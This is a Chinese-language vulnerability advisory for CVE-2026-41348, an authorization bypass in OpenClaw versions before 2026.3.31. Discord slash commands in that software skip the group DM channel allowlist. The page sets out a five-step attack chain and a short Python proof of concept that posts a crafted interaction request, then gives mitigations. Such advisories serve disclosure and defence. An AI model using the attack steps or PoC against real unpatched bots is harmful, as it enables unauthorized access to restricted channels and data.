CVE-2026-41348 CVSS 5.4 中危

CVE-2026-41348 OpenClaw授权绕过漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41348

漏洞类型

授权绕过

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.31之前的版本中存在授权绕过漏洞。该漏洞源于Discord斜杠命令和自动完成路径未能强制执行群组DM频道允许列表限制。经过身份验证的Discord用户可以通过调用斜杠命令绕过频道限制，从而访问受限的群组DM频道。

技术细节

该漏洞的核心在于OpenClaw处理Discord斜杠命令及其自动完成交互请求时，未正确校验当前交互发生的频道是否处于允许列表中。正常情况下，系统应限制只能在特定的公开频道或白名单内的群组DM中使用特定命令。然而，由于权限校验逻辑缺失，攻击者只需是经过身份验证的Discord用户，即可在受限的群组DM频道中直接触发斜杠命令。通过构造特定的命令参数或利用自动完成接口，攻击者能够绕过前端或中间件层面的频道限制，直接调用后端敏感接口，从而导致未授权访问受限信息或执行受限操作。

攻击链分析

STEP 1

信息收集

识别目标使用的是OpenClaw 2026.3.31之前的版本，并确定Discord Bot的Application ID和可用命令列表。

STEP 2

获取低权限身份

攻击者注册一个普通Discord账号，并获得目标服务器的访问权限，成为经过身份验证的授权用户。

STEP 3

构建恶意请求

攻击者在受限的群组DM频道中，构造包含特定命令名称和参数的斜杠命令请求。

STEP 4

发送利用请求

向Discord API发送该交互请求，由于后端未校验频道限制，请求被OpenClaw后端正常处理。

STEP 5

未授权访问

OpenClaw返回本应受限的数据或执行了本应受限的操作，完成攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target interaction endpoint for Discord bot
target_url = "https://discord.com/api/v9/interactions"

# Payload simulating a slash command invocation in a restricted Group DM
payload = {
    "type": 2,  # ApplicationCommand type
    "application_id": "TARGET_APPLICATION_ID",
    "guild_id": "TARGET_GUILD_ID",
    "channel_id": "RESTRICTED_GROUP_DM_ID", # ID of the restricted channel
    "session_id": "ATTACKER_SESSION_ID",
    "data": {
        "version": "COMMAND_VERSION",
        "id": "COMMAND_ID",
        "name": "vulnerable_command",
        "type": 1
    },
    "nonce": "RANDOM_NONCE_STRING"
}

headers = {
    "Authorization": "ATTACKER_DISCORD_TOKEN",
    "Content-Type": "application/json"
}

# Send the interaction request
try:
    response = requests.post(target_url, json=payload, headers=headers)
    if response.status_code in [200, 204]:
        print("[+] Authorization bypass successful: Command executed in restricted channel.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"Error: {e}")

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用OpenClaw的Discord斜杠命令功能，或者在Discord开发者门户中严格配置Bot的Scope，禁止其接收群组DM消息，直到应用补丁。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表